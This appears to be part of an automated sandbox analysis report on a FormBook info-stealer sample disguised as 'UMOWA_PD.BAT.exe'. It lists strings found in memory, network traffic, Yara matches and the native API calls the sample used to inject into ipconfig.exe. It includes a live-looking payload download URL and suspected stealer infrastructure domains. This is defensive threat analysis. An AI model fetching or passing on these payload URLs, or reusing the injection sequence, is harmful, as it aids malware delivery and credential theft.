        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Instagram_Online_Sign_Up.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEX
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Instagram_Online_Viewer.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXK
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Lexus_SUV_Specs.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXPQRCFFn
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/New_Toyota_Camry.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXPQRCFF
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Toyota_Highlander.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXPQRCF
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.online
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=ns
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/display.cfm
        Source: ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inastra.online/px.js?ch=1
        Source: ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inastra.online/px.js?ch=2
        Source: ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inastra.online/sk-logabpstatus.php?a=SW1RdDVpeXN5Y0RTL3pGdHVTRDlkWG5JV05MNzRrTHJVYU1uM2xS
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: firefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15299140949.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/POL.bin
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/POL.bin.~
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/POL.binNy
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/POL.binl
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15299140949.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/o
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: firefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
        Source: firefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
        Source: -11EqE.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: -11EqE.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
        Source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15573540125.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567298333.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567599300.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15573540125.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567298333.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567599300.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15573540125.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567298333.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567599300.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: ipconfig.exe, 00000004.00000003.15566169625.0000000007D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DD0000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DD0000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: -11EqE.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
        Source: firefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
        Source: ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownHTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49756 version: TLS 1.2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD34E0 NtCreateMutant,LdrInitializeThunk,2_2_33CD34E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33CD2B90
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33CD2D10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD4260 NtSetContextThread,2_2_33CD4260
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD4570 NtSuspendThread,2_2_33CD4570
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2BC0 NtQueryInformationToken,2_2_33CD2BC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2BE0 NtQueryVirtualMemory,2_2_33CD2BE0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B80 NtCreateKey,2_2_33CD2B80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B00 NtQueryValueKey,2_2_33CD2B00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B10 NtAllocateVirtualMemory,2_2_33CD2B10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B20 NtQueryInformationProcess,2_2_33CD2B20
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2AC0 NtEnumerateValueKey,2_2_33CD2AC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2A80 NtClose,2_2_33CD2A80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2AA0 NtQueryInformationFile,2_2_33CD2AA0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2A10 NtWriteFile,2_2_33CD2A10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD29D0 NtWaitForSingleObject,2_2_33CD29D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD29F0 NtReadFile,2_2_33CD29F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD38D0 NtGetContextThread,2_2_33CD38D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2FB0 NtSetValueKey,2_2_33CD2FB0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2F00 NtCreateFile,2_2_33CD2F00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2F30 NtOpenDirectoryObject,2_2_33CD2F30
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2EC0 NtQuerySection,2_2_33CD2EC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2ED0 NtResumeThread,2_2_33CD2ED0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E80 NtCreateProcessEx,2_2_33CD2E80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2EB0 NtProtectVirtualMemory,2_2_33CD2EB0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E50 NtCreateSection,2_2_33CD2E50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E00 NtQueueApcThread,2_2_33CD2E00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2DC0 NtAdjustPrivilegesToken,2_2_33CD2DC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2DA0 NtReadVirtualMemory,2_2_33CD2DA0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2D50 NtWriteVirtualMemory,2_2_33CD2D50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2CD0 NtEnumerateKey,2_2_33CD2CD0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2CF0 NtDelayExecution,2_2_33CD2CF0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD3C90 NtOpenThread,2_2_33CD3C90
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C50 NtUnmapViewOfSection,2_2_33CD2C50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C10 NtOpenProcess,2_2_33CD2C10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C20 NtSetInformationFile,2_2_33CD2C20
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD3C30 NtOpenProcessToken,2_2_33CD3C30
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C30 NtMapViewOfSection,2_2_33CD2C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03264260 NtSetContextThread,LdrInitializeThunk,4_2_03264260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03264570 NtSuspendThread,LdrInitializeThunk,4_2_03264570
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032634E0 NtCreateMutant,LdrInitializeThunk,4_2_032634E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B80 NtCreateKey,LdrInitializeThunk,4_2_03262B80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03262B90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_03262BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262A10 NtWriteFile,LdrInitializeThunk,4_2_03262A10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262A80 NtClose,LdrInitializeThunk,4_2_03262A80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032629F0 NtReadFile,LdrInitializeThunk,4_2_032629F0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032638D0 NtGetContextThread,LdrInitializeThunk,4_2_032638D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262F00 NtCreateFile,LdrInitializeThunk,4_2_03262F00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E00 NtQueueApcThread,LdrInitializeThunk,4_2_03262E00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E50 NtCreateSection,LdrInitializeThunk,4_2_03262E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262ED0 NtResumeThread,LdrInitializeThunk,4_2_03262ED0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_03262D10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C30 NtMapViewOfSection,LdrInitializeThunk,4_2_03262C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03262C50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262CF0 NtDelayExecution,LdrInitializeThunk,4_2_03262CF0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B20 NtQueryInformationProcess,4_2_03262B20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B00 NtQueryValueKey,4_2_03262B00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B10 NtAllocateVirtualMemory,4_2_03262B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262BE0 NtQueryVirtualMemory,4_2_03262BE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262AA0 NtQueryInformationFile,4_2_03262AA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262AC0 NtEnumerateValueKey,4_2_03262AC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032629D0 NtWaitForSingleObject,4_2_032629D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262F30 NtOpenDirectoryObject,4_2_03262F30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262FB0 NtSetValueKey,4_2_03262FB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262EB0 NtProtectVirtualMemory,4_2_03262EB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E80 NtCreateProcessEx,4_2_03262E80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262EC0 NtQuerySection,4_2_03262EC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262D50 NtWriteVirtualMemory,4_2_03262D50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262DA0 NtReadVirtualMemory,4_2_03262DA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262DC0 NtAdjustPrivilegesToken,4_2_03262DC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C20 NtSetInformationFile,4_2_03262C20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03263C30 NtOpenProcessToken,4_2_03263C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C10 NtOpenProcess,4_2_03262C10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03263C90 NtOpenThread,4_2_03263C90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262CD0 NtEnumerateKey,4_2_03262CD0
